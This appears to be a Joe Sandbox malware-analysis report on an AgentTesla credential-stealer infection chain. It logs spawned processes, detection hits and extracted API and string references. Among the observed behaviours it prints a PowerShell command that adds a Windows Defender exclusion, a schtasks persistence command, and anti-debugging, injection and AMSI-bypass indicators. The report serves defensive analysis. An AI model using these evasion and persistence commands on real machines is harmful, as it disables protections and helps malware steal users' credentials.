Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1624352397.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:00:23
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase:	0x150000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:00:25
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:	0xdc0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:00:25
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f
Imagebase:	0xec0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:00:25
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:00:26
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:00:26
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0xe70000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	11:00:27
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFF65.tmp.cmd""
Imagebase:	0xd70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	11:00:27
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	11:00:27
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 6
Imagebase:	0xfd0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:00:28
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Imagebase:	0x450000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:00:30
Start date:	21/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6616b0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:00:32
Start date:	21/11/2024
Path:	C:\Users\Public\Libraries\Wisrysxl.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Wisrysxl.PIF"
Imagebase:	0x400000
File size:	1'392'640 bytes
MD5 hash:	67DAC6AE9EE770115DB85CC71979DC41
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	11:00:34
Start date:	21/11/2024
Path:	C:\Users\Public\Libraries\lxsyrsiW.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\lxsyrsiW.pif
Imagebase:	0x400000
File size:	68'096 bytes
MD5 hash:	C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	11:00:35
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase:	0x8f0000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	11:00:35
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase:	0xbe0000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	11:00:41
Start date:	21/11/2024
Path:	C:\Users\Public\Libraries\Wisrysxl.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Wisrysxl.PIF"
Imagebase:	0x400000
File size:	1'392'640 bytes
MD5 hash:	67DAC6AE9EE770115DB85CC71979DC41
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	11:00:43
Start date:	21/11/2024
Path:	C:\Users\Public\Libraries\lxsyrsiW.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\lxsyrsiW.pif
Imagebase:	0x400000
File size:	68'096 bytes
MD5 hash:	C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	11:00:44
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase:	0xaa0000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	11:00:44
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase:	0xf40000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	11:00:50
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0xc80000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	11:01:03
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	67.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	25

Executed Functions

Function 02E5F7C8 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071COMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,02E6B784,?,?,?,00000000,00000000), ref: 02E5F801

Part of subcall function 02E589D0: FreeLibrary.KERNEL32(743E0000,00000000,00000000,00000000,00000000,02EC738C,Function_0000662C,00000004,02EC739C,02EC738C,05F5E103,00000040,02EC73A0,743E0000,00000000,00000000), ref: 02E58AAA

Part of subcall function 02E5F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02E5FAEB,UacInitialize,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,Initialize), ref: 02E5F6EE
Part of subcall function 02E5F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02E5F700

Part of subcall function 02E5F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02E5F754
Part of subcall function 02E5F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02E5F766
Part of subcall function 02E5F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02E5F77D

Part of subcall function 02E47E5C: GetFileAttributesA.KERNEL32(00000000,?,02E6041F,ScanString,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,UacScan,02EC7380,02E6B7B8,UacInitialize), ref: 02E47E67

Part of subcall function 02E4C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02FBB8B8,?,02E60751,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,OpenSession), ref: 02E4C37B

Part of subcall function 02E5DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E5DE40), ref: 02E5DDAB
Part of subcall function 02E5DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02E5DE40), ref: 02E5DDDB
Part of subcall function 02E5DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02E5DDF0
Part of subcall function 02E5DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02E5DE1C
Part of subcall function 02E5DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02E5DE25

Part of subcall function 02E47E80: GetFileAttributesA.KERNEL32(00000000,?,02E6356F,ScanString,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,Initialize), ref: 02E47E8B

Part of subcall function 02E48048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02E6370D,OpenSession,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,Initialize,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8), ref: 02E48055

Strings

NtGetWriteWatch, xrefs: 02E6AE7E
NtQuerySystemInformation, xrefs: 02E6A976
OpenSession, xrefs: 02E5F89A, 02E5FA2A, 02E60312, 02E60433, 02E60540, 02E60658, 02E60A2C, 02E60BCA, 02E60D70, 02E60E90, 02E61025, 02E6111D, 02E6130A, 02E614B0, 02E617DE, 02E61A0C, 02E61B80, 02E61CA3, 02E61E21, 02E621C7, 02E6224A, 02E62362, 02E6247A, 02E62586, 02E627A4, 02E628C1, 02E62B60, 02E62BDC, 02E62DF1, 02E62F91, 02E632D3, 02E63461, 02E6367B, 02E63795, 02E63B36, 02E65634, 02E657CE, 02E6596E, 02E65B13, 02E65C87, 02E65ED7, 02E65F8B, 02E66248, 02E66340, 02E667EF, 02E66AC9, 02E66C3D, 02E66DD3, 02E66F83, 02E6766C, 02E67871, 02E67A8A, 02E67B2D, 02E67CC0, 02E68088, 02E68324, 02E68621, 02E6877A, 02E68920, 02E68AAD, 02E68C41, 02E68DC0, 02E68EC3, 02E69037, 02E692B5, 02E694A5, 02E69796, 02E6991C, 02E69B77, 02E69D7D, 02E69F41, 02E6A230, 02E6A2DF, 02E6A51F, 02E6A716, 02E6A80E, 02E6ACC0, 02E6B288
DlpNotifyPreDragDrop, xrefs: 02E6A44D
sppwmi, xrefs: 02E6ADFC
Initialize, xrefs: 02E5F8FE, 02E6081C, 02E609B0, 02E60B4E, 02E60CF4, 02E60FA9, 02E6164C, 02E61A88, 02E61F32, 02E6203C, 02E62723, 02E62A55, 02E62D75, 02E630A9, 02E63257, 02E63583, 02E6393C, 02E65876, 02E65C0B, 02E66007, 02E661CC, 02E66438, 02E6656E, 02E66773, 02E676E8, 02E683A0, 02E693AD, 02E69FBD, 02E6A35B, 02E6A88A, 02E6AC44, 02E6B190
[InternetShortcut], xrefs: 02E66D48
FindCertsByIssuer, xrefs: 02E5FC69
NtSetSecurityObject, xrefs: 02E69276
GetProxyDllInfo, xrefs: 02E5FB2A
BCryptVerifySignature, xrefs: 02E5FEA9, 02E6A2A6
NtQueryVirtualMemory, xrefs: 02E6AEB1
EnumServicesStatusW, xrefs: 02E6A9C1
GetProcessMemoryInfo, xrefs: 02E6A148
MiniDumpWriteDump, xrefs: 02E6924E
SLGatherMigrationBlob, xrefs: 02E6AE18
tquery, xrefs: 02E6A0C6
SLIsGenuineLocalEx, xrefs: 02E69ED5
BCryptRegisterProvider, xrefs: 02E5FF0F
LdrGetProcedureAddress, xrefs: 02E6B07C
NtQueryDirectoryFile, xrefs: 02E6A994
RtlCreateQueryDebugBuffer, xrefs: 02E6A6DD
WintrustAddActionID, xrefs: 02E5FC36
DlpCheckIsCloudSyncApp, xrefs: 02E6A480
smartscreenps, xrefs: 02E60051, 02E60084, 02E600B7
C:\Windows\System32\, xrefs: 02E6040A, 02E6796B, 02E686B3
ntdll, xrefs: 02E6922B, 02E6927B, 02E6928F, 02E6A628, 02E6A65B, 02E6A68E, 02E6A6C1, 02E6A6F4, 02E6AE95, 02E6AEC8, 02E6AEFB, 02E6AF2E, 02E6AF61, 02E6AF94, 02E6AFC7, 02E6AFFA, 02E6B02D, 02E6B060, 02E6B093, 02E6B0C6, 02E6B0F9, 02E6B12C, 02E6B15F
LdrLoadDll, xrefs: 02E6B049
ScanBuffer, xrefs: 02E5F9C6, 02E5FD1E, 02E5FF48, 02E604AF, 02E605BC, 02E606D4, 02E60AA8, 02E60C46, 02E60DEC, 02E60F0C, 02E610A1, 02E61199, 02E61402, 02E615A8, 02E61744, 02E6185A, 02E618E8, 02E61BFC, 02E61E9D, 02E61FAE, 02E6214B, 02E624F6, 02E62602, 02E62820, 02E6293D, 02E62C58, 02E62CF9, 02E62E6D, 02E6302D, 02E6334F, 02E63719, 02E639B8, 02E63ABA, 02E656B0, 02E659EA, 02E65D03, 02E66083, 02E663BC, 02E66666, 02E6686B, 02E669D1, 02E66B45, 02E66BC1, 02E67764, 02E677F5, 02E67C25, 02E67DB8, 02E67F14, 02E6800C, 02E68529, 02E687F6, 02E6899C, 02E68B29, 02E68CBD, 02E68E3C, 02E690B3, 02E691AB, 02E695C7, 02E698A0, 02E69A39, 02E69C6F, 02E69D01, 02E6A039, 02E6A3D7, 02E6A906, 02E6B20C
NtAlertResumeThread, xrefs: 02E6A611
/d , xrefs: 02E664B5
NtOpenProcess, xrefs: 02E6928A
NtAccessCheck, xrefs: 02E6B016
EtwEventWrite, xrefs: 02E6B148
NtDeviceIoControlFile, xrefs: 02E6A985
SLGetEncryptedPIDEx, xrefs: 02E6AE4B
I_QueryTagInformation, xrefs: 02E6923A
DllRegisterServer, xrefs: 02E5FB54, 02E600A0
NtWaitForSingleObject, xrefs: 02E6A677
CreateProcessAsUserW, xrefs: 02E6AA2A, 02E6AA48
NtQuerySecurityObject, xrefs: 02E6AFE3
MZP, xrefs: 02E69992
SLGetSLIDList, xrefs: 02E69EA2
OpenProcess, xrefs: 02E6AB72
bcrypt, xrefs: 02E5FEC0, 02E5FEF3, 02E5FF26, 02E6A2BD
mssip32, xrefs: 02E5FDAB, 02E5FDDE, 02E5FE11, 02E6A192
IconIndex=, xrefs: 02E66DAD
psapi, xrefs: 02E6A15F
can, xrefs: 02E63D15
NtWriteVirtualMemory, xrefs: 02E6B0AF
psapi, xrefs: 02E6A9F3
DlpGetArchiveFileTraceInfo, xrefs: 02E6A4B3
DllGetActivationFactory, xrefs: 02E6006D
SLGetGenuineInformation, xrefs: 02E69E6F
SLLoadApplicationPolicies, xrefs: 02E69F08
DlpGetWebSiteAccess, xrefs: 02E6A4E6
ieproxy, xrefs: 02E5FB14, 02E5FB3B, 02E5FB6B
VirtualAllocEx, xrefs: 02E6AB0C
BCryptQueryProviderRegistration, xrefs: 02E5FEDC
URL=file:", xrefs: 02E66D57
CreateProcessWithLogonW, xrefs: 02E6AA39
SxTracerGetThreadContextDebug, xrefs: 02E6A0E2, 02E6ADB2
C:\\Windows\\System32\\esentutl.exe /y , xrefs: 02E664AA
CryptSIPGetInfo, xrefs: 02E5FD94
NtOpenObjectAuditAlarm, xrefs: 02E69226
WriteVirtualMemory, xrefs: 02E6ABA5
NtOpenFile, xrefs: 02E6B0E2
CreateProcessAsUserA, xrefs: 02E6AA1B
NtOpenSection, xrefs: 02E6AF17
FlushInstructionCache, xrefs: 02E6ABD8
RetailTracerEnable, xrefs: 02E6A0AF
GET, xrefs: 02E62455
UacInitialize, xrefs: 02E5FA8E, 02E60155, 02E60898, 02E6553C, 02E658F2, 02E65DDF, 02E678ED, 02E6912F, 02E6954B
UacUninitialize, xrefs: 02E63844, 02E63BB2
WinHttp.WinHttpRequest.5.1, xrefs: 02E6233C
kernel32, xrefs: 02E6AAF0, 02E6AB23, 02E6AB56, 02E6AB89, 02E6ABBC, 02E6ABEF, 02E6AC22
UacScan, xrefs: 02E5F836, 02E600D9, 02E601D1, 02E607A0, 02E61386, 02E61964, 02E622C6, 02E629D9, 02E63C2E, 02E65B8F, 02E660FF, 02E662C4, 02E665EA, 02E666F7, 02E66955, 02E66A4D, 02E675F0, 02E67992, 02E67BA9, 02E67D3C, 02E67F90, 02E6841C, 02E685A5, 02E686FE, 02E688A4, 02E68A31, 02E68BC5, 02E68D44, 02E68FBB, 02E69429, 02E69643, 02E69824, 02E699BD, 02E69BF3, 02E6AA63
NtCreateSection, xrefs: 02E6AF4A
endpointdlp, xrefs: 02E6A464, 02E6A497, 02E6A4CA, 02E6A4FD
ScanString, xrefs: 02E5F962, 02E5FB8D, 02E5FCA2, 02E5FE33, 02E5FFC4, 02E6024D, 02E6038E, 02E60914, 02E6152C, 02E616C8, 02E61B04, 02E61D1F, 02E61D9B, 02E620B8, 02E623DE, 02E626A7, 02E62AE4, 02E62F15, 02E63125, 02E631DB, 02E634DD, 02E635FF, 02E638C0, 02E655B8, 02E65752, 02E65A97, 02E65E5B, 02E664F2, 02E66CD8, 02E66E4F, 02E66F07, 02E67574, 02E67A0E, 02E67E75, 02E68498, 02E68F3F, 02E69331, 02E6971A, 02E69AFB, 02E69DF9, 02E6A1B4, 02E6A59B, 02E6A792, 02E6AD3C
C:\Users\Public\, xrefs: 02E65D88, 02E66FF3
spp, xrefs: 02E6A0F9, 02E6A12C, 02E6ADC9
EnumServicesStatusExW, xrefs: 02E6A9DF
VirtualAlloc, xrefs: 02E6AAD9
DllGetClassObject, xrefs: 02E5FB03, 02E6003A, 02E6A115, 02E6ADE5
GZmMS1j, xrefs: 02E5F80F
EtwEventWriteEx, xrefs: 02E6B115
NtMapViewOfSection, xrefs: 02E6AF7D
HotKey=, xrefs: 02E66EE1
wintrust, xrefs: 02E5FC1A, 02E5FC4D, 02E5FC80
.url, xrefs: 02E65D93
advapi32, xrefs: 02E6923F
RtlQueryProcessDebugInformation, xrefs: 02E6A9A3
NtQueryInformationThread, xrefs: 02E6AEE4
CreateProcessW, xrefs: 02E6AA0C
CreateProcessA, xrefs: 02E6A9FD
Advapi, xrefs: 02E6A9B7, 02E6A9C6, 02E6A9D5, 02E6A9E4, 02E6AA20, 02E6AA2F, 02E6AA3E
dbgcore, xrefs: 02E69253, 02E69267
http, xrefs: 02E62128
TrustOpenStores, xrefs: 02E5FC03
EnumServicesStatusExA, xrefs: 02E6A9D0
SetUnhandledExceptionFilter, xrefs: 02E6AC0B
RtlAllocateHeap, xrefs: 02E6A644, 02E6A6AA
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 02E6098A
NtReadVirtualMemory, xrefs: 02E6AFB0
CryptSIPVerifyIndirectData, xrefs: 02E5FDC7, 02E6A17B
C:\\Users\\Public\\Libraries\\, xrefs: 02E6616F
Kernel32, xrefs: 02E6AA02, 02E6AA11, 02E6AA4D
EnumProcessModules, xrefs: 02E6A9EE
VirtualProtect, xrefs: 02E6AB3F
MiniDumpReadDumpStream, xrefs: 02E69262
sppc, xrefs: 02E69E86, 02E69EB9, 02E69EEC, 02E69F1F, 02E6AE2F, 02E6AE62
EnumServicesStatusA, xrefs: 02E6A9B2
Ntdll, xrefs: 02E6A97B, 02E6A98A, 02E6A999, 02E6A9A8
/o, xrefs: 02E664C0
CryptSIPGetSignedDataMsg, xrefs: 02E5FDFA
acS, xrefs: 02E63D02

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
API String ID: 297057983-2644593349
Opcode ID: 69c1a52c65da3413937133b24ec658ae0d6449f74940c0c6727dfcc98a2c651c
Instruction ID: b1475161bfcf3dcbc93108f032fc18a9c2bc70a08f66034144299ef5c32eeeda
Opcode Fuzzy Hash: 69c1a52c65da3413937133b24ec658ae0d6449f74940c0c6727dfcc98a2c651c
Instruction Fuzzy Hash: 4A142A74BC015D8BDB11EB64EC85ADE73B6FB85304F60E1E5A508AB654DE30AE82CF41

Function 02E58D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654
threadnativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

